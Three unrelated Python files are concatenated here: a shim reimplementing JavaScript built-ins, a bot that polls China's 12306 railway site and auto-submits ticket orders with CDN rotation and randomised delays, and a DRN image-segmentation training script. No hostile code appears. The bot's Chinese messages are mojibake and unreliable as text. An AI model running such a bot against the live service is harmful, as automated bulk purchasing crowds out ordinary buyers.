{"name": "Int16Array", "_pack": __byteutils__.packI16, "_unpack": __byteutils__.unpackI16},
)
Int16Array.BYTES_PER_ELEMENT = 2
Uint16Array = type(
"Uint16Array",
(TypedArray,),
{"name": "Uint16Array", "_pack": __byteutils__.packU16, "_unpack": __byteutils__.unpackU16},
)
Uint16Array.BYTES_PER_ELEMENT = 2
Int32Array = type(
"Int32Array",
(TypedArray,),
{"name": "Int32Array", "_pack": __byteutils__.packI32, "_unpack": __byteutils__.unpackI32},
)
Int32Array.BYTES_PER_ELEMENT = 4
Uint32Array = type(
"Uint32Array",
(TypedArray,),
{"name": "Uint32Array", "_pack": __byteutils__.packU32, "_unpack": __byteutils__.unpackU32},
)
Uint32Array.BYTES_PER_ELEMENT = 4
Float32Array = type(
"Float32Array",
(TypedArray,),
{"name": "Float32Array", "_pack": __byteutils__.packF32, "_unpack": __byteutils__.unpackF32},
)
Float32Array.BYTES_PER_ELEMENT = 4
Float64Array = type(
"Float64Array",
(TypedArray,),
{"name": "Float64Array", "_pack": __byteutils__.packF64, "_unpack": __byteutils__.unpackF64},
)
Float64Array.BYTES_PER_ELEMENT = 8
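# A usage sketch for the generated typed-array classes (assumes Global.Number yields ints for integral input):
# >>> i8 = Int8Array([1, 2, 250])
# >>> i8[2]  # values wrap as signed 8-bit integers
# -6
# >>> Uint8Array([250])[0]
# 250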
# BigInt64Array = type('BigInt64Array',
# (TypedArray,), {'name': 'BigInt64Array', '_pack': __byteutils__.packI64, '_unpack': __byteutils__.unpackI64})
# BigInt64Array.BYTES_PER_ELEMENT = 8
# BigUint64Array = type('BigUint64Array',
# (TypedArray,), {'name': 'BigUint64Array', '_pack': __byteutils__.packU64, '_unpack': __byteutils__.unpackU64})
# BigUint64Array.BYTES_PER_ELEMENT = 8
# TODO - test
class Error(Exception):
"""Raise Errors"""
def __init__(self, message, *args, **kwargs):
self.message = message
super(Error, self).__init__(message)
# def __str__(self):
# return self.message
# Error
# AggregateError
# EvalError
# InternalError
# RangeError
# ReferenceError
# SyntaxError
# TypeError
# URIError
# ---- STUBBING OUT SOME NEW ONES TO WORK ON ----
class Reflect:
"""
The Reflect object provides the following static functions which have the same names as the proxy handler methods.
Some of these methods are also the same as corresponding methods on Object,
although they do have some subtle differences between them.
"""
@staticmethod
def ownKeys(target):
"""Returns an array of the target object's own (not inherited) property keys."""
return target.keys()
# return target.__dict__.keys()
@staticmethod
def apply(target, thisArgument, argumentsList):
"""Calls a target function with arguments as specified by the argumentsList parameter.
See also Function.prototype.apply()."""
return target(*argumentsList)
@staticmethod
def construct(target, argumentsList, newTarget):
"""The new operator as a function. Equivalent to calling new target(...argumentsList).
Also provides the option to specify a different prototype."""
raise NotImplementedError
@staticmethod
def defineProperty(target, propertyKey, attributes):
"""Similar to Object.defineProperty().
Returns a Boolean that is true if the property was successfully defined."""
raise NotImplementedError
@staticmethod
def deleteProperty(target, propertyKey):
"""The delete operator as a function. Equivalent to calling delete target[propertyKey]."""
raise NotImplementedError
@staticmethod
def get(target, propertyKey, receiver):
"""Returns the value of the property.
Works like getting a property from an object (target[propertyKey]) as a function."""
raise NotImplementedError
@staticmethod
def getOwnPropertyDescriptor(target, propertyKey):
"""Similar to Object.getOwnPropertyDescriptor().
Returns a property descriptor of the given property if it exists on the object, undefined otherwise."""
raise NotImplementedError
getPrototypeOf = Object.getPrototypeOf
# isExtensible = Object.isExtensible
@staticmethod
def has(target, propertyKey):
"""Returns a Boolean indicating whether the target has the property.
Either as own or inherited. Works like the in operator as a function."""
raise NotImplementedError
@staticmethod
def preventExtensions(target):
"""Similar to Object.preventExtensions(). Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
@staticmethod
def set(target, propertyKey, value, receiver):
"""A function that assigns values to properties.
Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
@staticmethod
def setPrototypeOf(target, prototype):
"""A function that sets the prototype of an object. Returns a Boolean that is true if the update was successful."""
raise NotImplementedError
class Symbol:
# a global registry for symbols
registry = []
# Creates a new Symbol object.
def __init__(self, symbol):
self.symbol = symbol
self.description = None
self.registry.append(self)
# self.__class__.registry = self.registry
def hasInstance(self, obj):
"""[A method determining if a constructor object recognizes an object as its instance. Used by instanceof.]
Args:
obj ([type]): [a constructor object]
Returns:
[type]: [True if obj is an instance of this symbol, False otherwise]
"""
return self.symbol == obj.symbol
def isConcatSpreadable(self):
"""A Boolean value indicating if an object should be flattened to its array elements.
Used by Array.prototype.concat()."""
return False
def iterator(self, obj):
"""A method returning the default iterator for an object. Used by for...of."""
return iter(obj)
def asyncIterator(self, obj):
"""A method that returns the default AsyncIterator for an object. Used by for await...of."""
return iter(obj)
# A method that matches against a string, also used to determine if an object may be used as a regular expression.
def match(self, item):
"""A method that matches the symbol against a string,
also used to determine if an object may be used as a regular expression."""
raise NotImplementedError
# A method that returns an iterator, that yields matches of the regular expression against a string.
# Used by String.prototype.matchAll().
# def matchAll(self, obj):
# if isinstance(obj, str):
# return obj == self.symbol
# return False
# A method that replaces matched substrings of a string. Used by String.prototype.replace().
# def replace(self,
# A method that returns the index within a string that matches the regular expression.
# Used by String.prototype.search().
def search(self):
raise NotImplementedError
# A method that splits a string at the indices that match a regular expression. Used by String.prototype.split().
def split(self):
raise NotImplementedError
# A constructor function that is used to create derived objects.
def species(self):
raise NotImplementedError
# A method converting an object to a primitive value.
def toPrimitive(self):
raise NotImplementedError
# A string value used for the default description of an object.
# Used by Object.prototype.toString().
def toStringTag(self):
raise NotImplementedError
# An object value of whose own and inherited property names are excluded from the with environment bindings of the associated object.
def unscopables(self):
raise NotImplementedError
# @staticmethod
# def for(key):
# """ Searches for existing Symbols with the given key and returns it if found.
# Otherwise a new Symbol gets created in the global Symbol registry with key. """
# raise NotImplementedError
# @staticmethod
# def keyFor(sym)
# """ Retrieves a shared Symbol key from the global Symbol registry for the given Symbol. """
# raise NotImplementedError
def toSource(self):
"""Returns a string containing the source of the Symbol. Overrides the Object.prototype.toSource() method."""
raise NotImplementedError
def toString(self):
"""Returns a string containing the description of the Symbol.
Overrides the Object.prototype.toString() method."""
raise NotImplementedError
def valueOf(self):
"""Returns the Symbol. Overrides the Object.prototype.valueOf() method."""
raise NotImplementedError
# class _TNow:
# def timeZone():
# pass
# def instant():
# pass
# def plainDateTime(calendar, temporalTimeZoneLike):
# pass
# def plainDateTimeISO(temporalTimeZoneLike):
# pass
# def zonedDateTime(calendar, temporalTimeZoneLike):
# pass
# def zonedDateTimeISO(temporalTimeZoneLike):
# pass
# def plainDate(calendar, temporalTimeZoneLike):
# pass
# def plainDateISO(temporalTimeZoneLike):
# pass
# def plainTimeISO(temporalTimeZoneLike):
# pass
# class Temporal(Object):
# @staticmethod
# def Now(self):
# return _TNow()
# @staticmethod
# def _from(self, temporal):
# pass
'''
class Atomics():
"""
The Atomics object provides atomic operations as static methods
They are used with SharedArrayBuffer and ArrayBuffer objects.
When memory is shared, multiple threads can read and write the same data in memory.
Atomic operations make sure that predictable values are written and read,
that operations are finished before the next operation starts and that operations are not interrupted.
Wait and notify
The wait() and notify() methods are modeled on Linux futexes ("fast user-space mutex") and provide ways for waiting
until a certain condition becomes true and are typically used as blocking constructs.
"""
@staticmethod
def add(array, index, value):
""" Adds the provided value to the existing value at the specified index of the array.
Returns the old value at that index."""
return array.add(index, value)
def and_(array, index, value):
""" Computes a bitwise AND on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
    @staticmethod
    def compareExchange(array, index, value):
        """ Stores a value at the specified index of the array, if it equals a value. Returns the old value."""
        raise NotImplementedError
@staticmethod
def exchange():
""" Stores a value at the specified index of the array. Returns the old value."""
raise NotImplementedError
@staticmethod
def isLockFree(size):
""" An optimization primitive that can be used to determine whether to use locks or atomic operations.
Returns true if an atomic operation on arrays of the given element size will be implemented
using a hardware atomic operation (as opposed to a lock). Experts only."""
raise NotImplementedError
@staticmethod
def load():
""" Returns the value at the specified index of the array."""
raise NotImplementedError
    # @staticmethod
    # def notify(array, index, count):
    #     """ Notifies agents that are waiting on the specified index of the array.
    #     Returns the number of agents that were notified."""
    #     raise NotImplementedError
@staticmethod
    def or_(array, index, value):
""" Computes a bitwise OR on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
@staticmethod
    def store(array, index, value):
""" Stores a value at the specified index of the array. Returns the value."""
raise NotImplementedError
@staticmethod
    def sub(array, index, value):
""" Subtracts a value at the specified index of the array. Returns the old value at that index."""
raise NotImplementedError
@staticmethod
    def wait(array, index, value, timeout=None):
""" Verifies that the specified index of the array still contains a value and sleeps awaiting or times out.
Returns either "ok", "not-equal", or "timed-out". If waiting is not allowed in the calling agent
then it throws an Error exception. (Most browsers will not allow wait() on the browser's main thread.)"""
raise NotImplementedError
@staticmethod
    def xor(array, index, value):
""" Computes a bitwise XOR on the value at the specified index of the array with the provided value.
Returns the old value at that index."""
raise NotImplementedError
'''
# debugger: stops the execution of JavaScript and calls (if available) the debugging function.
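# A minimal sketch, not part of the shim above: emulating the futex-style
# Atomics.wait()/Atomics.notify() protocol with a threading.Condition.
# The class name and the plain-list "shared array" are illustrative
# assumptions, not any real API.
import threading

class _WaitNotifySketch:
    def __init__(self, size):
        self._cells = [0] * size
        self._cond = threading.Condition()

    def wait(self, index, value, timeout=None):
        """Block while cells[index] stays equal to value.
        Returns "ok", "not-equal", or "timed-out", mirroring Atomics.wait()."""
        with self._cond:
            if self._cells[index] != value:
                return "not-equal"
            changed = self._cond.wait_for(
                lambda: self._cells[index] != value, timeout)
            return "ok" if changed else "timed-out"

    def store_and_notify(self, index, value):
        """Store value at index and wake every thread waiting on the condition."""
        with self._cond:
            self._cells[index] = value
            self._cond.notify_all()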
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
    Fast ticket submission channel.
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list)
self.httpClint.cdn = self.cdn_list[random.randint(0, 4)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
่ทๅ้
็ฝฎไฟกๆฏ
:return:
"""
print(u"*" * 50)
print(f"ๆฃๆฅๅฝๅ็ๆฌไธบ: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"ๆฃๆฅๅฝๅpython็ๆฌไธบ๏ผ{}๏ผ็ฎๅ็ๆฌๅชๆฏๆ3.6ไปฅไธ".format(version))
if version < "3.6.0":
raise Exception
print(u"12306ๅท็ฅจๅฐๅฉๆ๏ผๆๅๆดๆฐไบ2019.09.18๏ผ่ฏทๅฟไฝไธบๅไธ็จ้๏ผไบคๆต็พคๅท๏ผ"
u" 1็พค๏ผ286271084(ๅทฒๆปก)\n"
u" 2็พค๏ผ649992274(ๅทฒๆปก)\n"
u" 3็พค๏ผ632501142(ๅทฒๆปก)\n"
u" 4็พค: 606340519(ๅทฒๆปก)\n"
u" 5็พค: 948526733(ๅทฒๆปก)\n"
u" 7็พค: 660689659(ๅทฒๆปก)\n"
u" 8็พค: 620629239(ๅทฒๆปก)\n"
u" 6็พค: 608792930(ๆชๆปก)\n"
u" 9็พค: 693035807(ๆชๆปก)\n"
)
        print(
            f"Current configuration:\n"
            f"From station: {TickerConfig.FROM_STATION}\n"
            f"To station: {TickerConfig.TO_STATION}\n"
            f"Trains: {','.join(TickerConfig.STATION_TRAINS) or 'all trains'}\n"
            f"Travel dates: {','.join(TickerConfig.STATION_DATES)}\n"
            f"Departure time range: {TickerConfig.START_TIME}-{TickerConfig.END_TIME}\n"
            f"Seat types: {','.join(TickerConfig.SET_TYPE)}\n"
            f"Submit even when tickets are fewer than passengers: {TickerConfig.IS_MORE_TICKET}\n"
            f"Passengers: {TickerConfig.TICKET_PEOPLES}\n"
            f"Query interval: random (1-3s)\n"
            f"Zombie-ticket blacklist duration: {TickerConfig.TICKET_BLACK_LIST_TIME}\n"
            f"Order API: {TickerConfig.ORDER_TYPE}\n"
            f"Order mode: {TickerConfig.ORDER_MODEL}\n"
            f"Scheduled start time: {TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
่ฏปๅ่ฝฆ็ซไฟกๆฏ
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
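    # A station_name.txt record (assumed format, matching 12306's
    # station_name.js) looks like:
    #   bjb|北京北|VAP|beijingbei|bjb|0
    # so n_info[1] is the Chinese station name and n_info[2] its telecode.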
def call_login(self, auth=False):
"""
็ปๅฝๅ่ฐๆนๆณ
:return:
"""
if auth:
return self.login.auth()
else:
            configCommon.checkSleepTime(self)  # avoid running during 12306's overnight downtime
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
        t.daemon = True
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
now = datetime.datetime.now()
        if TickerConfig.ORDER_MODEL == 1:
            print(f"Booking has not started yet, blocking until {TickerConfig.OPEN_TIME} (current time: {now.strftime('%H:%M:%S')})")
sleep_time_s = 0.1
sleep_time_t = 0.3
            # Measured a microsecond-level error, which should be negligible (sample: 2019-01-02 22:30:00.004555);
            # the start is still delayed by the duration of the last refresh, and there is no good fix for that yet.
while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
time.sleep(0.0001)
print(f"้ขๅฎๅผๅง๏ผๅผๅฏๆถ้ดไธบ: {now.strftime('%H:%M:%S')}")
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
while 1:
try:
num += 1
                now = datetime.datetime.now()  # thanks to a group member for the cleaner snippet
                configCommon.checkSleepTime(self)  # pause during the overnight downtime
q = query(selectObj=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
start_time=TickerConfig.START_TIME,
end_time=TickerConfig.END_TIME
)
queryResult = q.sendQuery()
                # query API response
if queryResult.get("status"):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
                        # fetch passenger contacts
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
                                             # standby (waitlist) orders need multiple seat types
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
                            # Submit the order.
                            # There are two order paths: normal (grab) orders and standby (waitlist) orders.
                            if secretStr:  # normal order
                                if TickerConfig.ORDER_TYPE == 1:  # fast order path
a = autoSubmitOrderRequest(selectObj=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
                                elif TickerConfig.ORDER_TYPE == 2:  # standard order path
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
                            elif secretList:  # standby (waitlist) order
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
                    nateMsg = ' no standby chance' if TickerConfig.ORDER_TYPE == 2 else ""
                    print(f"Query #{num}  back-off: {random_time}s  dates: {','.join(TickerConfig.STATION_DATES)}  trains: {','.join(TickerConfig.STATION_TRAINS) or 'all trains'}"
                          f"  time range: {TickerConfig.START_TIME}-{TickerConfig.END_TIME}"
                          f"  no tickets to order{nateMsg}  elapsed: {(datetime.datetime.now() - now).microseconds / 1000}ms {queryResult.get('cdn')}")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
            except ValueError as e:
                if str(e) == "No JSON object could be decoded":
                    print(u"No response from the 12306 API, retrying")
                else:
                    print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306ๆฅๅฃๆ ๅๅบ๏ผๆญฃๅจ้่ฏ {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("้ฟๆฒ", "ๆทฑๅณ")
|
segment.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import math
import os
from os.path import exists, join, split
import threading
import time
import numpy as np
import shutil
import sys
from PIL import Image
import torch
from torch import nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
import drn
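# NOTE: data_transforms deliberately shadows torchvision.transforms imported
# above; it provides joint image/label transforms under the same names.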
import data_transforms as transforms
try:
from modules import batchnormsync
except ImportError:
pass
FORMAT = "[%(asctime)-15s %(filename)s:%(lineno)d %(funcName)s] %(message)s"
logging.basicConfig(format=FORMAT)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
CITYSCAPE_PALETTE = np.asarray([
[128, 64, 128],
[244, 35, 232],
[70, 70, 70],
[102, 102, 156],
[190, 153, 153],
[153, 153, 153],
[250, 170, 30],
[220, 220, 0],
[107, 142, 35],
[152, 251, 152],
[70, 130, 180],
[220, 20, 60],
[255, 0, 0],
[0, 0, 142],
[0, 0, 70],
[0, 60, 100],
[0, 80, 100],
[0, 0, 230],
[119, 11, 32],
[0, 0, 0]], dtype=np.uint8)
TRIPLET_PALETTE = np.asarray([
[0, 0, 0, 255],
[217, 83, 79, 255],
[91, 192, 222, 255]], dtype=np.uint8)
def fill_up_weights(up):
    # Initialize the transposed convolution as bilinear upsampling:
    # build a separable bilinear kernel once and copy it to every channel.
    w = up.weight.data
    f = math.ceil(w.size(2) / 2)
    c = (2 * f - 1 - f % 2) / (2. * f)
    for i in range(w.size(2)):
        for j in range(w.size(3)):
            w[0, 0, i, j] = \
                (1 - math.fabs(i / f - c)) * (1 - math.fabs(j / f - c))
    for c in range(1, w.size(0)):
        w[c, 0, :, :] = w[0, 0, :, :]
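# Worked example (illustrative, not from the code above): for a 4x4 kernel,
# f = 2 and c = 0.75, so the 1-D weights are [0.25, 0.75, 0.75, 0.25] and the
# 2-D kernel is their outer product -- exactly the bilinear interpolation
# kernel for 2x upsampling. The 16x16/stride-8 kernel built for DRNSeg below
# is the corresponding 8x case.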
class DRNSeg(nn.Module):
def __init__(self, model_name, classes, pretrained_model=None,
pretrained=True, use_torch_up=False):
super(DRNSeg, self).__init__()
model = drn.__dict__.get(model_name)(
pretrained=pretrained, num_classes=1000)
pmodel = nn.DataParallel(model)
if pretrained_model is not None:
pmodel.load_state_dict(pretrained_model)
self.base = nn.Sequential(*list(model.children())[:-2])
self.seg = nn.Conv2d(model.out_dim, classes,
kernel_size=1, bias=True)
self.softmax = nn.LogSoftmax()
m = self.seg
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
m.bias.data.zero_()
if use_torch_up:
self.up = nn.UpsamplingBilinear2d(scale_factor=8)
else:
up = nn.ConvTranspose2d(classes, classes, 16, stride=8, padding=4,
output_padding=0, groups=classes,
bias=False)
fill_up_weights(up)
up.weight.requires_grad = False
self.up = up
def forward(self, x):
x = self.base(x)
x = self.seg(x)
y = self.up(x)
return self.softmax(y), x
def optim_parameters(self, memo=None):
for param in self.base.parameters():
yield param
for param in self.seg.parameters():
yield param
class SegList(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, list_dir=None,
out_name=False):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.out_name = out_name
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
data = list(self.transforms(*data))
if self.out_name:
if self.label_list is None:
data.append(data[0][0, :, :])
data.append(self.image_list[index])
return tuple(data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
class SegListMS(torch.utils.data.Dataset):
def __init__(self, data_dir, phase, transforms, scales, list_dir=None):
self.list_dir = data_dir if list_dir is None else list_dir
self.data_dir = data_dir
self.phase = phase
self.transforms = transforms
self.image_list = None
self.label_list = None
self.bbox_list = None
self.read_lists()
self.scales = scales
def __getitem__(self, index):
data = [Image.open(join(self.data_dir, self.image_list[index]))]
w, h = data[0].size
if self.label_list is not None:
data.append(Image.open(
join(self.data_dir, self.label_list[index])))
# data = list(self.transforms(*data))
out_data = list(self.transforms(*data))
ms_images = [self.transforms(data[0].resize((int(w * s), int(h * s)),
Image.BICUBIC))[0]
for s in self.scales]
out_data.append(self.image_list[index])
out_data.extend(ms_images)
return tuple(out_data)
def __len__(self):
return len(self.image_list)
def read_lists(self):
image_path = join(self.list_dir, self.phase + '_images.txt')
label_path = join(self.list_dir, self.phase + '_labels.txt')
assert exists(image_path)
self.image_list = [line.strip() for line in open(image_path, 'r')]
if exists(label_path):
self.label_list = [line.strip() for line in open(label_path, 'r')]
assert len(self.image_list) == len(self.label_list)
def validate(val_loader, model, criterion, eval_score=None, print_freq=10):
batch_time = AverageMeter()
losses = AverageMeter()
score = AverageMeter()
# switch to evaluate mode
model.eval()
end = time.time()
for i, (input, target) in enumerate(val_loader):
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input, volatile=True)
target_var = torch.autograd.Variable(target, volatile=True)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
score.update(eval_score(output, target_var), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Test: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {score.val:.3f} ({score.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time, loss=losses,
score=score))
logger.info(' * Score {top1.avg:.3f}'.format(top1=score))
return score.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target):
"""Computes the precision@k for the specified values of k"""
# batch_size = target.size(0) * target.size(1) * target.size(2)
_, pred = output.max(1)
pred = pred.view(1, -1)
target = target.view(1, -1)
correct = pred.eq(target)
correct = correct[target != 255]
correct = correct.view(-1)
score = correct.float().sum(0).mul(100.0 / correct.size(0))
return score.data[0]
def train(train_loader, model, criterion, optimizer, epoch,
eval_score=None, print_freq=10):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
scores = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if type(criterion) in [torch.nn.modules.loss.L1Loss,
torch.nn.modules.loss.MSELoss]:
target = target.float()
input = input.cuda()
target = target.cuda(async=True)
input_var = torch.autograd.Variable(input)
target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t),
list_dir=args.list_dir),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
]), list_dir=args.list_dir),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
    # define the optimizer (the criterion was defined above)
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
